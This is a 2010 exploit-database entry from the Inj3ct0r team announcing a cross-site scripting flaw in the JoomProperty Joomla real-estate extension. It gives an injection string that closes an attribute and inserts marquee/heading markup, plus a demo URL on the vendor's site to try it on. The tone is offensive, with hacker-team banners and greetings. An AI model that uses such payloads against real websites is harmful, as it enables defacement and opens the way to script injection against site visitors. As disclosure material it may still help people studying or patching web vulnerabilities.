Joomla joomproperty XSS Vulnerability

2010-06-30T00:00:00
ID 1337DAY-ID-12399
Type zdt
Reporter Sid3^effects
Modified 2010-06-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================
Joomla joomproperty XSS Vulnerability
=====================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :  Joomla joomproperty XSS Vulnerability
Date : june, 30 2010
Critical Level     : HIGH
Vendor Url : http://www.joomproperty.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:

JoomProperty enables you to create a phenomenal real estate website for your clients so they can dominate the listing market!  Today's most

successful Realtors have already realized that consumers are using search engines to buy and sell real estate. JoomProperty from its front

end display to its extremely user-friendly backend technology, is built to adhere to search engines' best practices.

###############################################################################################################

Xploit: XSS Vulnerability

Attack pattern : ">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>

DEMO URL :http://demo.joomproperty.com/search-real-estate

###############################################################################################################
# 0day no more
# Sid3^effects 



#  0day.today [2018-02-20]  #